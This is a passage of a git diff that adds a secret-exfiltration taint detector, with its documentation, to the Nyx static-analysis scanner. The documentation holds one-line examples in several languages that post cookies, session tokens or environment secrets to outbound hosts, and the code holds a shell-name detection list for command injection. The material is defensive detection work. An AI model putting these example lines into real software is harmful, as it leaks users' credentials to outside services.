+tracker.send +analytics.track +metrics.report +logEvent +``` + +If your codebase follows this convention, the cap stops firing on these calls automatically. Extend the convention with your own forwarding wrappers via the standard custom-rule path: + +```toml +[[analysis.languages.javascript.rules]] +matchers = ["dispatchTelemetry", "sendToBus"] +kind = "sanitizer" +cap = "data_exfil" +``` + +The rule of thumb: a function that *only* exists to ship a payload to a known boundary belongs in this list. A function that *might* leak (a generic HTTP wrapper, a logging helper that writes to an arbitrary destination) does not. + +### 2. Destination allowlist + +Configure a set of trusted outbound prefixes once and the cap is dropped on every site whose destination argument has a static prefix that begins with one of them: + +```toml +[detectors.data_exfil] +trusted_destinations = [ + "https://api.internal/", + "https://telemetry.", +] +``` + +Use full origins or origin-pinned paths so a partial-host match across unrelated origins cannot occur. `https://api.` would also match `https://api.evil.example.com/` — the entry must include the path separator (`/`) at the end of the host. + +The match consults the abstract string domain: a literal URL is a static prefix; a template literal `\`https://api.internal/${id}\`` exposes the prefix `https://api.internal/`; a fully dynamic URL has no prefix and the cap fires as usual. + +### 3. Detector-class disable + +Some projects forward user-bound payloads as a matter of architecture. Turn the entire detector class off when the noise is permanent: + +```toml +[detectors.data_exfil] +enabled = false +``` + +`enabled = false` strips `Cap::DATA_EXFIL` from sink caps before event emission, so no `taint-data-exfiltration` finding reaches the report. The decision is per-project — other projects loaded by the same `nyx serve` instance keep their own settings. + +## DATA_EXFIL sinks per language + +Sinks Nyx ships with for `Cap::DATA_EXFIL`. The body, headers, or json payload arg fires; the URL arg routes through the SSRF gate and emits `taint-unsanitised-flow` instead. + +| Language | Sinks | Example | +|---|---|---| +| JavaScript, TypeScript | `fetch(url, {body, headers, json})` body-bind, `XMLHttpRequest.prototype.send`, type-qualified `HttpClient.send` | `fetch('/upload', {method: 'POST', body: req.cookies.session})` | +| Python | `requests.post / put / patch` body and json kwargs, `httpx.AsyncClient().post` json kwarg, `aiohttp.ClientSession().post` body, dict round-trip into json | `requests.post('https://api.internal/ingest', json={'k': os.environ.get('SECRET')})` | +| Java | `HttpClient.send` with `BodyPublishers.ofString`, OkHttp `newCall(req).execute` body chain, Apache `HttpClient.execute(HttpPost)`, `RestTemplate.postForEntity / exchange`, `WebClient.post().bodyValue / body` | `client.send(HttpRequest.newBuilder().uri(...).POST(BodyPublishers.ofString(token)).build(), ...)` | +| Go | `http.Post(url, ct, body)` body arg, `http.PostForm` form arg, `(*http.Client).Do(req)` after `http.NewRequest`, `(*http.Request).Body` assignment | `http.Post("https://analytics.internal/track", "text/plain", strings.NewReader(c.Value))` | +| Rust | `reqwest::Client.post().body / json / form / multipart().send()`, `ureq::post().send_string / send_form / send_json`, `surf::post().body_string / body_json`, `hyper::Request::builder().body()` | `reqwest::Client::new().post(url).form(&secret).send()` | +| Ruby | `Net::HTTP.post(uri, body)` body arg, `Net::HTTP::Post.new(uri).body=`, `RestClient.post / put`, `HTTParty.post(url, body: ...)` body | `Net::HTTP.post(URI('https://analytics.internal/track'), "session=#{request.cookies[:auth]}")` | +| C, C++ | `curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body)` and `CURLOPT_COPYPOSTFIELDS` gated sinks (macro-arg activation), `CURLOPT_POSTFIELDSIZE` body-bind | `curl_easy_setopt(curl, CURLOPT_POSTFIELDS, getenv("AUTH_TOKEN"));` | +| PHP | `curl_setopt($ch, CURLOPT_POSTFIELDS, $body)`, `Guzzle\Client.post($url, ['body' => $tainted])`, `Symfony\HttpClient->request('POST', $url, ['body' => $tainted])` | `curl_setopt($ch, CURLOPT_POSTFIELDS, $_COOKIE['session']);` | + +Add project-specific sinks with `nyx config add-rule --kind sink --cap data_exfil --matcher ` or the equivalent TOML rule. + +## DATA_EXFIL calibration ranges + +`taint-data-exfiltration` is calibrated below the other taint classes on purpose. + +| Source kind | Severity | Confidence ceiling | +|---|---|---| +| Cookie, environment variable | High | Medium | +| Header | Medium | Medium | +| File system, database | Medium | Medium | +| Caught exception | Medium | Low | + +Path-validated flows (`path_validated: true`) drop one severity tier. Confidence drops to Low when the abstract or symbolic domain cannot corroborate a concrete string reaching the outbound payload (for example, when the body comes from a callee with no summary). + +Attack-surface score ranges: + +| Finding shape | Score | +|---|---| +| High DATA_EXFIL, cookie or env source, body confirmed | around 76 | +| Medium DATA_EXFIL, header, fs, db, or caught-exception source | 40 to 45 | +| Low DATA_EXFIL, no abstract corroboration, path-validated | 18 to 25 | + +For reference: High SSRF, SQLi, cmdi land at 76 to 81; Medium taint with env source lands at 45 to 50; AST-only patterns sit around 10. Data-exfil sits below the direct-compromise classes but above informational AST patterns. diff --git a/frontend/src/pages/FindingDetailPage.tsx b/frontend/src/pages/FindingDetailPage.tsx index d76d1168..57c49bd7 100644 --- a/frontend/src/pages/FindingDetailPage.tsx +++ b/frontend/src/pages/FindingDetailPage.tsx @@ -594,6 +594,9 @@ function sinkCapKey(finding: FindingView): string | null { const snippet = (finding.evidence?.sink?.snippet || '').toLowerCase(); const rule = finding.rule_id.toLowerCase(); + if (rule.includes('data-exfiltration') || rule.includes('exfil')) + return 'data-exfil'; + if ( /innerhtml|outerhtml|document\.write|dangerouslysetinnerhtml/.test(snippet) ) @@ -615,7 +618,6 @@ function sinkCapKey(finding: FindingView): string | null { if (/readfile|fs\.|open\s*\(|path\.join/.test(snippet)) return 'path'; if (/\bfetch\b|\baxios\b|http\.|request\.|urlopen|curl/.test(snippet)) return 'ssrf'; - if (rule.includes('xss')) return 'xss'; if (rule.includes('sql')) return 'sql'; if (rule.includes('cmd') || rule.includes('command')) return 'cmd-inject'; @@ -663,6 +665,11 @@ const TAINT_REMEDIATION: Record = { 'Replace dynamic code generation with a parser over an allowlisted grammar.', 'If scripting is required, sandbox it (VM / Web Worker with no DOM, seccomp).', ], + 'data-exfil': [ + 'Do not put cookies, session tokens, or env secrets into outbound request bodies.', + 'If the forward is intentional, allowlist the destination under `detectors.data_exfil.trusted_destinations` or route through a named wrapper the engine treats as a data-exfil sanitizer.', + 'Use dedicated server-to-server credentials for the upstream call instead of forwarding the user session.', + ], }; const DEFAULT_TAINT_REMEDIATION: string[] = [ diff --git a/src/ast.rs b/src/ast.rs index 269f16e1..6d3d12b2 100644 --- a/src/ast.rs +++ b/src/ast.rs @@ -145,6 +145,11 @@ fn resolve_file_rel(file_rel: &str, scan_root: Option<&Path>, fallback: &Path) - /// Build a [`Diag`] from a taint [`Finding`], the CFG that produced it, /// the parsed tree (for byte→line/col conversion) and the file path. +/// +/// Returns `None` when source-sensitivity gating fully suppresses the +/// finding (the canonical case is a multi-gate `DATA_EXFIL` event whose +/// contributing source is plain user input — see the +/// `effective_caps` strip below). fn build_taint_diag( finding: &crate::taint::Finding, cfg_graph: &crate::cfg::Cfg, @@ -152,7 +157,7 @@ fn build_taint_diag( path: &Path, src: &[u8], scan_root: Option<&Path>, -) -> Diag { +) -> Option { let call_site_byte = cfg_graph[finding.sink].classification_span().0; let call_site_point = byte_offset_to_point(tree, call_site_byte); // `finding.source` should be a NodeIndex valid in this body's CFG, but @@ -373,16 +378,63 @@ fn build_taint_diag( // SSA dispatch) when populated; fall back to the union of all sink-label // caps on the CFG node so legacy paths that build findings without // setting `effective_sink_caps` still pick the right rule id. - let effective_caps = if finding.effective_sink_caps.is_empty() { + let mut effective_caps = if finding.effective_sink_caps.is_empty() { crate::labels::Cap::from_bits_truncate(sink_caps_bits) } else { finding.effective_sink_caps }; + + // Source-sensitivity gate for `DATA_EXFIL`. Plain attacker input echoed + // back into an outbound request body / headers / json is not data + // exfiltration, the user already controls the value, surfacing it as a + // leak is noise (the canonical false-positive class for API gateways + // and telemetry forwarders that proxy `req.body`). A `DATA_EXFIL` + // finding requires the contributing source to be at least `Sensitive` + // (cookies, headers, env, db rows, file reads). Plain user-input + // sources have the cap stripped so the finding either drops entirely + // or downgrades to whatever non-`DATA_EXFIL` cap also applies (e.g. + // SSRF on the URL position of the same `fetch` call). + if effective_caps.contains(crate::labels::Cap::DATA_EXFIL) + && finding.source_kind.sensitivity() < crate::labels::Sensitivity::Sensitive + { + effective_caps.remove(crate::labels::Cap::DATA_EXFIL); + // The multi-gate dispatch produces one finding per (source, sink-cap) + // pair, a body-flow finding's `effective_sink_caps` is exactly the + // cap that fired (e.g. `DATA_EXFIL`). When that single cap is the + // sensitivity-stripped one, the finding has no surviving rationale + // and we drop it entirely rather than reroute it to the generic + // `taint-unsanitised-flow` bucket (which would just re-emit the same + // false positive under a different rule id). Findings with a + // multi-cap `effective_sink_caps` keep their non-DATA_EXFIL caps and + // are routed normally below. + if finding.effective_sink_caps == crate::labels::Cap::DATA_EXFIL { + return None; + } + } + + // DATA_EXFIL routing. + // + // Multi-gate dispatch (JS / Go) emits one event per cap, so by this + // point each finding's `effective_sink_caps` carries exactly one bit + // and the simple `DATA_EXFIL && !SSRF` test routes correctly. Flat- + // rule paths (Java HTTP clients where type-qualified resolution + // attaches both `SSRF` and `DATA_EXFIL` Sink labels to the same call, + // e.g. `client.send(req)` covering both URL and body channels of the + // request value) produce a single dual-cap event. In that case the + // source's sensitivity tier disambiguates: a Sensitive source + // (cookie, header, env, db, session) leaking into an outbound + // request is canonically DATA_EXFIL even if the sink also carries + // an SSRF label, because operator-bound state is not URL-shaped + // attacker input. Plain user input keeps SSRF routing (the typical + // user-controlled-URL pattern). + let is_data_exfil_rule = effective_caps.contains(crate::labels::Cap::DATA_EXFIL) + && !effective_caps.contains(crate::labels::Cap::UNAUTHORIZED_ID) + && (!effective_caps.contains(crate::labels::Cap::SSRF) + || finding.source_kind.sensitivity() >= crate::labels::Sensitivity::Sensitive); + let diag_id = if effective_caps.contains(crate::labels::Cap::UNAUTHORIZED_ID) { "rs.auth.missing_ownership_check.taint".to_string() - } else if effective_caps.contains(crate::labels::Cap::DATA_EXFIL) - && !effective_caps.contains(crate::labels::Cap::SSRF) - { + } else if is_data_exfil_rule { format!( "taint-data-exfiltration (source {}:{})", source_point.row + 1, @@ -396,18 +448,86 @@ fn build_taint_diag( ) }; + // For `DATA_EXFIL` rules, look up which destination object-literal field + // (`body` / `headers` / `json`) the tainted value reached. Each + // [`crate::cfg::GateFilter`] carries `destination_uses` (var names) in + // parallel with `destination_fields` (the field each var was bound to), + // so we walk the gate filter whose `label_caps` includes `DATA_EXFIL` + // and match the tainted var name from the last flow step. Falls back + // to the first non-empty destination field on the matching filter when + // the var-name match fails (e.g. the SSA sink event is reported on a + // copy-propagated value whose name no longer matches the original + // destination ident). `None` when the sink wasn't a destination-aware + // gate (no object literal, or non-fetch sink). + let data_exfil_field: Option = if is_data_exfil_rule { + let last_var = finding + .flow_steps + .last() + .and_then(|s| s.var_name.as_deref()); + let filters = &cfg_graph[finding.sink].call.gate_filters; + filters + .iter() + .find(|f| f.label_caps.contains(crate::labels::Cap::DATA_EXFIL)) + .and_then(|f| { + if let (Some(uses), Some(var)) = (f.destination_uses.as_ref(), last_var) + && let Some(idx) = uses.iter().position(|u| u == var) + { + return f.destination_fields.get(idx).cloned(); + } + f.destination_fields.first().cloned() + }) + } else { + None + }; + + // DATA_EXFIL severity calibration (Phase: detector ranking). + // + // Generic taint severity comes from `severity_for_source_kind`, which + // maps Cookie/Header/Env to High because those sources are spicy + // *as taint roots*. For `DATA_EXFIL` we are scoring the leak class, + // not the source itself: not every Sensitive-tier source is a Secret. + // Cookies and env carry credential / session material whose leakage + // is an immediate disclosure (Secret-tier); request headers, file + // reads, db rows, and caught exceptions are Sensitive but not + // automatically secret, so they downgrade to Medium. Plain user + // input is already stripped above by the source-sensitivity gate, so + // the `_` arm here is reached only by Sensitive sources that are not + // explicit secrets. + let severity = if is_data_exfil_rule { + match finding.source_kind { + crate::labels::SourceKind::Cookie | crate::labels::SourceKind::EnvironmentConfig => { + crate::patterns::Severity::High + } + _ => crate::patterns::Severity::Medium, + } + } else { + severity_for_source_kind(finding.source_kind) + }; + + // DATA_EXFIL: surface the destination field in the message so analysts + // see at a glance whether the leak reached the request body, headers, + // or json payload. Generic taint findings stay on the existing + // "unsanitised … flows from … → …" template. + let message = if is_data_exfil_rule { + let suffix = data_exfil_field + .as_deref() + .map(|f| format!(" ({f} field)")) + .unwrap_or_default(); + format!("sensitive data flows from {short_source} \u{2192} {sink_display}{suffix}") + } else { + format!("unsanitised {kind_label} flows from {short_source} \u{2192} {sink_display}") + }; + let mut diag = Diag { path: primary_path.clone(), line: primary_line, col: primary_col, - severity: severity_for_source_kind(finding.source_kind), + severity, id: diag_id, category: FindingCategory::Security, path_validated: finding.path_validated, guard_kind: finding.guard_kind.map(|k| format!("{k:?}")), - message: Some(format!( - "unsanitised {kind_label} flows from {short_source} \u{2192} {sink_display}" - )), + message: Some(message), labels, confidence: None, evidence: Some(Evidence { @@ -448,6 +568,7 @@ fn build_taint_diag( symbolic: finding.symbolic.clone(), sink_caps: sink_caps_bits, engine_notes: finding.engine_notes.clone(), + data_exfil_field, ..Default::default() }), rank_score: None, @@ -467,7 +588,7 @@ fn build_taint_diag( ev.confidence_limiters = limiters; } - diag + Some(diag) } /// Resolve a file extension to a language slug (e.g. `"rust"`, @@ -622,6 +743,8 @@ fn source_kind_label(sk: crate::labels::SourceKind) -> &'static str { use crate::labels::SourceKind; match sk { SourceKind::UserInput => "user input", + SourceKind::Cookie => "cookie value", + SourceKind::Header => "request header", SourceKind::EnvironmentConfig => "environment config", SourceKind::FileSystem => "file system data", SourceKind::Database => "database result", @@ -1198,18 +1321,31 @@ impl<'a> ParsedFile<'a> { continue; } - out.push(build_taint_diag( + if let Some(diag) = build_taint_diag( finding, body_cfg, &self.source.tree, self.source.path, self.source.bytes, scan_root, - )); + ) { + out.push(diag); + } } // ── CFG structural analyses (per body) ───────────────────────── let taint_active = global_summaries.is_some() || !taint_results.is_empty(); + // Pre-compute, per body, the set of variable names whose + // release / close calls live in a NESTED closure body inside + // that body (e.g. `socket.on("close", () => ws.close())`). + // Both the structural ResourceMisuse pass and the state-model + // leak pass consult it to suppress findings whose cleanup is + // registered as a callback the per-body CFG can't follow. + // Only descendants count — sibling methods on the same class + // don't share resource ownership. + let closure_released_per_body = + state::collect_closure_released_var_names(&self.file_cfg.bodies, caller_lang); + let empty_set: std::collections::HashSet = std::collections::HashSet::new(); for body in &self.file_cfg.bodies { let body_taint: Vec<_> = taint_results .iter() @@ -1231,6 +1367,11 @@ impl<'a> ParsedFile<'a> { body_const_facts: body_const_facts.as_ref(), type_facts: body_const_facts.as_ref().map(|f| &f.type_facts), auth_decorators: &body.meta.auth_decorators, + closure_released_var_names: Some( + closure_released_per_body + .get(&body.meta.id) + .unwrap_or(&empty_set), + ), }; for cf in cfg_analysis::run_all(&cfg_ctx) { let point = byte_offset_to_point(&self.source.tree, cf.span.0); @@ -1307,6 +1448,11 @@ impl<'a> ParsedFile<'a> { &body.meta.auth_decorators, &path_safe_suppressed_spans, body_pointer_hints.as_ref(), + Some( + closure_released_per_body + .get(&body.meta.id) + .unwrap_or(&empty_set), + ), ); for sf in &state_findings { diff --git a/src/cfg/cfg_tests.rs b/src/cfg/cfg_tests.rs index 4b5080b3..de7edc0d 100644 --- a/src/cfg/cfg_tests.rs +++ b/src/cfg/cfg_tests.rs @@ -1118,6 +1118,7 @@ fn clone_preserves_all_sub_structs() { arg_string_literals: vec![Some("lit".into())], destination_uses: None, gate_filters: Vec::new(), + is_constructor: false, }, taint: TaintMeta { labels: { diff --git a/src/cfg/helpers.rs b/src/cfg/helpers.rs index 6a582ef6..6c5beb56 100644 --- a/src/cfg/helpers.rs +++ b/src/cfg/helpers.rs @@ -373,11 +373,26 @@ pub(crate) fn first_member_label( if let Some(full) = member_expr_text(n, code) { // Try the full text first, then progressively strip the last segment // to match rules like "process.env" from "process.env.CMD". + // + // The strip-and-retry only ever yields a sound label for Sources: + // `process.env.CMD` → strip → `process.env` makes sense because + // the receiver itself IS the source. Sinks and Sanitizers, by + // contrast, name the *operation* — `connection.query`, `eval`, + // `exec` — and stripping a trailing segment to match them is + // not semantically valid (e.g. `exec.start` should never be + // treated as a SHELL_ESCAPE sink because of bare `exec`). We + // accept any label on a full-text match (the behaviour callers + // already depend on for Source/Sink labels alike), but only + // accept Source labels after segment stripping. let mut candidate = full.as_str(); + let mut first = true; loop { if let Some(lbl) = classify(lang, candidate, extra_labels) { - return Some(lbl); + if first || matches!(lbl, DataLabel::Source(_)) { + return Some(lbl); + } } + first = false; match candidate.rsplit_once('.') { Some((prefix, _)) => candidate = prefix, None => break, diff --git a/src/cfg/literals.rs b/src/cfg/literals.rs index 4f2b06c8..7535a18c 100644 --- a/src/cfg/literals.rs +++ b/src/cfg/literals.rs @@ -38,25 +38,27 @@ pub(super) fn find_call_node<'a>(n: Node<'a>, lang: &str) -> Option> { } } -/// Extract identifiers from specified fields of an object-literal argument. +/// Extract `(field_name, ident_name)` pairs from specified fields of an +/// object-literal argument. /// /// Returns: -/// * `Some(names)` if the positional argument at `index` IS an object literal -/// (JS `object`, TS `object`, Python `dictionary`). `names` contains -/// identifiers lifted from pair values whose key matches any entry in -/// `fields` (case-sensitive; JS/TS identifiers). When no destination-field -/// pairs are present, returns `Some(vec![])`, the sink is effectively -/// silenced because no destination identifier exists. +/// * `Some(pairs)` if the positional argument at `index` IS an object literal +/// (JS `object`, TS `object`, Python `dictionary`). Each pair is +/// `(field_name, ident_name)` where `field_name` is the matched key from +/// `fields` and `ident_name` is an identifier lifted from that pair's +/// value expression. When no destination-field pairs are present, returns +/// `Some(vec![])`, the sink is effectively silenced because no destination +/// identifier exists. /// * `None` if the arg is absent, is not an object literal (plain string /// / ident / expression), or has splat/spread children that break static /// per-field reasoning. Callers fall back to the whole-arg positional /// filter in this case. -pub(super) fn extract_destination_field_idents( +pub(super) fn extract_destination_field_pairs( call_node: Node, arg_index: usize, fields: &[&str], code: &[u8], -) -> Option> { +) -> Option> { if fields.is_empty() { return None; } @@ -71,7 +73,7 @@ pub(super) fn extract_destination_field_idents( return None; } - let mut out: Vec = Vec::new(); + let mut out: Vec<(String, String)> = Vec::new(); let mut c = arg.walk(); for child in arg.named_children(&mut c) { match child.kind() { @@ -88,8 +90,8 @@ pub(super) fn extract_destination_field_idents( let Some(name) = text_of(child, code) else { continue; }; - if fields.iter().any(|&f| f == name) && !out.contains(&name) { - out.push(name); + if fields.iter().any(|&f| f == name) && !out.iter().any(|(_, v)| v == &name) { + out.push((name.clone(), name)); } } "pair" => { @@ -124,8 +126,8 @@ pub(super) fn extract_destination_field_idents( let mut paths: Vec = Vec::new(); collect_idents_with_paths(val_node, code, &mut idents, &mut paths); for name in paths.into_iter().chain(idents) { - if !out.contains(&name) { - out.push(name); + if !out.iter().any(|(_, v)| v == &name) { + out.push((key.clone(), name)); } } } @@ -135,6 +137,62 @@ pub(super) fn extract_destination_field_idents( Some(out) } +/// Extract `(field_name, ident_name)` pairs from `keyword_argument` / +/// `named_argument` children of a call whose keyword name matches one of +/// `fields`. Used for languages where destination-bearing fields are passed +/// as direct kwargs rather than wrapped in a dict literal, e.g. Python +/// `requests.post(url, data=tainted, json=safe)` where `data` and `json` are +/// `keyword_argument` siblings of the positional URL. +/// +/// Returns the union of matching kwargs, preserving the kwarg name in the +/// `field` slot so callers can still attribute findings per-field. Empty +/// when no matching kwargs exist or the call has no `arguments` field. +pub(super) fn extract_destination_kwarg_pairs( + call_node: Node, + fields: &[&str], + code: &[u8], +) -> Vec<(String, String)> { + if fields.is_empty() { + return Vec::new(); + } + let Some(args_node) = call_node.child_by_field_name("arguments") else { + return Vec::new(); + }; + let mut out: Vec<(String, String)> = Vec::new(); + let mut cursor = args_node.walk(); + for child in args_node.named_children(&mut cursor) { + let kind = child.kind(); + if kind != "keyword_argument" && kind != "named_argument" { + continue; + } + let named_count = child.named_child_count(); + let name_node = child + .child_by_field_name("name") + .or_else(|| child.named_child(0)); + let value_node = child + .child_by_field_name("value") + .or_else(|| child.named_child(named_count.saturating_sub(1) as u32)); + let (Some(nn), Some(vn)) = (name_node, value_node) else { + continue; + }; + let Some(name) = text_of(nn, code) else { + continue; + }; + if !fields.iter().any(|&f| f == name) { + continue; + } + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(vn, code, &mut idents, &mut paths); + for ident in paths.into_iter().chain(idents) { + if !out.iter().any(|(_, v)| v == &ident) { + out.push((name.clone(), ident)); + } + } + } + out +} + /// Extract the string-literal content at argument position `index` (0-based). /// Returns `None` if the argument is not a string literal or the index is out of range. pub(super) fn extract_const_string_arg( @@ -144,7 +202,14 @@ pub(super) fn extract_const_string_arg( ) -> Option { let args = call_node.child_by_field_name("arguments")?; let mut cursor = args.walk(); - let arg = args.named_children(&mut cursor).nth(index)?; + let mut arg = args.named_children(&mut cursor).nth(index)?; + // PHP / Go wrap each positional argument in an `argument` node; unwrap so + // the kind-match below sees the inner literal. + if arg.kind() == "argument" && arg.named_child_count() == 1 { + if let Some(inner) = arg.named_child(0) { + arg = inner; + } + } match arg.kind() { // `string` / `string_literal` cover JS/TS, Python, Java, PHP, C/C++, Ruby, Rust; // `interpreted_string_literal` / `raw_string_literal` cover Go's @@ -177,6 +242,39 @@ pub(super) fn extract_const_string_arg( } } +/// Extract a macro-constant or `define`d identifier name at argument position +/// `index` (0-based). Used for languages where activation values are +/// preprocessor symbols rather than string literals — currently C, C++, and +/// PHP define-constants like `CURLOPT_POSTFIELDS` whose syntactic form is an +/// `identifier` / `name` node, not a `string`. +/// +/// Returns `None` for any non-identifier shape so dynamic-activation +/// semantics still apply when the activation arg is a runtime value +/// (variable, expression, function call). +pub(super) fn extract_const_macro_arg( + call_node: Node, + index: usize, + code: &[u8], +) -> Option { + let args = call_node.child_by_field_name("arguments")?; + let mut cursor = args.walk(); + let mut arg = args.named_children(&mut cursor).nth(index)?; + if arg.kind() == "argument" && arg.named_child_count() == 1 { + if let Some(inner) = arg.named_child(0) { + arg = inner; + } + } + match arg.kind() { + // C/C++ identifier / PHP `name` node for define-style constants. + // Scoped C++ identifiers (`Curl::OPT_POSTFIELDS`) and PHP namespaced + // names also surface here so the dangerous_values match catches them. + "identifier" | "name" | "qualified_name" | "scoped_identifier" => { + text_of(arg, code).map(|s| s.to_string()) + } + _ => None, + } +} + /// Extract the value of a keyword argument from a call node (e.g. Python `shell=True`). /// Walks argument children looking for `keyword_argument` nodes, matches the keyword /// name, and extracts the value node text for literals. @@ -1546,6 +1644,59 @@ pub(super) fn def_use( (None, uses, vec![]) } + // for-in / for-of / Python `for x in iter:` ───────────────────────── + // + // Tree-sitter classifies these as `Kind::For` with a `left`/`right` + // field pair (binding pattern + iterable). Without an explicit + // arm here, the default branch collects every ident as a `use` and + // never registers the iteration binding as a `define`, so taint + // entering the iterable does not propagate into the body's + // references to the binding (`for (const [a, b] of obj) { sink(a) }` + // would lose the flow at `a`). + // + // C-style `for_statement` has no `left`/`right` fields (it uses + // `initializer`/`condition`/`increment`), so this path falls through + // to the default-collecting behaviour for those, preserving today's + // semantics. + Kind::For => { + let left = ast.child_by_field_name("left"); + let right = ast.child_by_field_name("right"); + if left.is_none() && right.is_none() { + // C-style for, defer to default ident collection. + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(ast, code, &mut idents, &mut paths); + let mut uses = paths; + uses.extend(idents); + return (None, uses, vec![]); + } + + let mut defs: Option = None; + let mut extra_defs: Vec = Vec::new(); + let mut uses: Vec = Vec::new(); + + if let Some(pat) = left { + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(pat, code, &mut idents, &mut paths); + let first = paths.pop().or_else(|| idents.first().cloned()); + for ident in &idents { + if first.as_ref() != Some(ident) { + extra_defs.push(ident.clone()); + } + } + defs = first; + } + if let Some(val) = right { + let mut idents = Vec::new(); + let mut paths = Vec::new(); + collect_idents_with_paths(val, code, &mut idents, &mut paths); + uses.extend(paths); + uses.extend(idents); + } + (defs, uses, extra_defs) + } + // everything else – no definition, but may read vars _ => { let mut idents = Vec::new(); @@ -1557,3 +1708,225 @@ pub(super) fn def_use( } } } + +/// One match from [`extract_shell_array_payload_idents`]. +/// +/// `arg_position` is the positional argument index of the call where the +/// shell-array literal was found. `payload_idents` is the union of +/// identifiers (and dotted paths) lifted from the array's payload elements +/// (positions 2+ for POSIX `sh -c ` form; positions 2+ for `cmd /c ` +/// likewise). Empty `payload_idents` means the payload is a constant string, +/// which the caller should treat as benign (no SHELL_ESCAPE finding possible). +#[derive(Debug, Clone)] +pub(super) struct ShellArrayMatch { + pub arg_position: usize, + pub payload_idents: Vec, +} + +/// Detect inline shell-execution array literals at a call site. +/// +/// Recognises the pattern `[, "-c", ]` (POSIX shells) and +/// `[, "/c"|"/C", ]` (Windows `cmd.exe`) appearing as +/// either: +/// * a direct positional argument of `call_node`, or +/// * the value of any field within an object-literal positional argument +/// (covers `container.exec({Cmd: ["bash", "-c", x]})` form). +/// +/// Returns one [`ShellArrayMatch`] per detected shell-array. Empty when the +/// call has no shell-array literals. +/// +/// The shell-name list is intentionally narrow (POSIX shells + Windows +/// `cmd.exe`/`powershell`) to avoid false positives on benign array literals +/// like `["ls", "-la"]` or `["git", "rev-parse", "HEAD"]`, where element 0 is +/// not a shell. Element 1 must be a literal `-c` (POSIX) or `/c`/`/C` (cmd); +/// otherwise the array is not in shell-exec form regardless of element 0. +/// +/// Identifiers from elements at positions 2+ are lifted via +/// [`collect_idents_with_paths`] so template-literal interpolations +/// (`` `echo ${x}` ``), member-expressions (`obj.field`), and bare idents are +/// all captured. Dedup is preserved across array elements so a single ident +/// referenced in multiple payload positions appears once. +pub(super) fn extract_shell_array_payload_idents( + call_node: Node, + code: &[u8], +) -> Vec { + let mut out = Vec::new(); + let Some(args_node) = call_node.child_by_field_name("arguments") else { + return out; + }; + let mut cursor = args_node.walk(); + for (idx, child) in args_node.named_children(&mut cursor).enumerate() { + let kind = child.kind(); + // Splats break positional indexing; bail conservatively on the whole call. + if kind == "spread_element" + || kind == "dictionary_splat" + || kind == "list_splat" + || kind == "splat_argument" + || kind == "hash_splat_argument" + { + return Vec::new(); + } + if kind == "keyword_argument" || kind == "named_argument" { + continue; + } + + // Direct array-literal arg. + if let Some(idents) = shell_array_payload_idents_of(child, code) { + out.push(ShellArrayMatch { + arg_position: idx, + payload_idents: idents, + }); + continue; + } + + // Object-literal arg whose field value is a shell-array literal. + // Covers `container.exec({Cmd: [...]})` form. Field name is not + // restricted to `Cmd` / `cmd`: the shell-shape itself is the gate, + // and the payload extraction is per-array. + if matches!(kind, "object" | "dictionary") { + let mut cc = child.walk(); + for pair in child.named_children(&mut cc) { + if pair.kind() != "pair" { + continue; + } + let Some(val_node) = pair.child_by_field_name("value") else { + continue; + }; + let val_node = unwrap_parens(val_node); + if let Some(idents) = shell_array_payload_idents_of(val_node, code) { + out.push(ShellArrayMatch { + arg_position: idx, + payload_idents: idents, + }); + } + } + } + } + out +} + +/// If `node` is an array literal of shape `[, "-c", *]` (POSIX shells) +/// or `[, "/c", *]` (Windows cmd.exe), return the identifiers +/// referenced in the payload elements (positions 2+). Otherwise return +/// `None`. Returning `Some(vec![])` means the payload is a constant string +/// — caller should still skip emitting a sink (no taint can reach a literal). +fn shell_array_payload_idents_of(node: Node, code: &[u8]) -> Option> { + let node = unwrap_parens(node); + if node.kind() != "array" { + return None; + } + // Walk named children to skip commas and other trivia. + let mut cursor = node.walk(); + let elems: Vec = node.named_children(&mut cursor).collect(); + if elems.len() < 3 { + return None; + } + let shell = const_string_value(elems[0], code)?; + if !is_known_shell(&shell) { + return None; + } + let flag = const_string_value(elems[1], code)?; + if !is_shell_command_flag(&shell, &flag) { + return None; + } + // Lift identifiers from the payload elements (positions 2+). Constants + // contribute nothing. An empty result means the entire payload is + // statically benign. + let mut idents: Vec = Vec::new(); + let mut paths: Vec = Vec::new(); + for elem in &elems[2..] { + collect_idents_with_paths(*elem, code, &mut idents, &mut paths); + } + let mut combined = paths; + combined.extend(idents); + // Dedup (preserve first-seen order). + let mut seen = std::collections::HashSet::new(); + combined.retain(|s| seen.insert(s.clone())); + if combined.is_empty() { + // Static payload — no taint can reach it. Return None so the caller + // does not emit a useless sink filter. + return None; + } + Some(combined) +} + +/// Extract a constant string value from `node`, handling JS/TS `string` / +/// `template_string` (no interpolation) forms. Returns `None` for dynamic +/// values, identifiers, or expressions. +fn const_string_value(node: Node, code: &[u8]) -> Option { + let node = unwrap_parens(node); + match node.kind() { + "string" | "string_literal" | "interpreted_string_literal" | "raw_string_literal" => { + let raw = text_of(node, code)?; + if raw.len() >= 2 { + Some(raw[1..raw.len() - 1].to_string()) + } else { + None + } + } + "template_string" => { + let mut c = node.walk(); + if node + .named_children(&mut c) + .any(|ch| ch.kind() == "template_substitution") + { + return None; + } + let raw = text_of(node, code)?; + if raw.len() >= 2 { + Some(raw[1..raw.len() - 1].to_string()) + } else { + None + } + } + _ => None, + } +} + +/// Known shell executable names that activate the shell-array detector. +/// Scoped narrowly to POSIX shells + Windows command interpreters, listing +/// only canonical names so benign arrays like `["ls", ...]`, `["git", ...]`, +/// or `["python", ...]` do not match. +fn is_known_shell(name: &str) -> bool { + // Strip directory prefix for matching: `/bin/bash` → `bash`. + let leaf = name.rsplit('/').next().unwrap_or(name); + matches!( + leaf, + "bash" + | "sh" + | "zsh" + | "dash" + | "ksh" + | "fish" + | "ash" + | "tcsh" + | "csh" + | "cmd" + | "cmd.exe" + | "powershell" + | "powershell.exe" + | "pwsh" + | "pwsh.exe" + ) +} + +/// True when `flag` is the "execute the following string as a shell command" +/// switch for the given `shell`. POSIX shells use `-c`; cmd.exe accepts +/// `/c` / `/C`; PowerShell uses `-Command` (also `-c` as alias) and +/// `-EncodedCommand`. +fn is_shell_command_flag(shell: &str, flag: &str) -> bool { + let leaf = shell.rsplit('/').next().unwrap_or(shell); + let is_cmd = matches!(leaf, "cmd" | 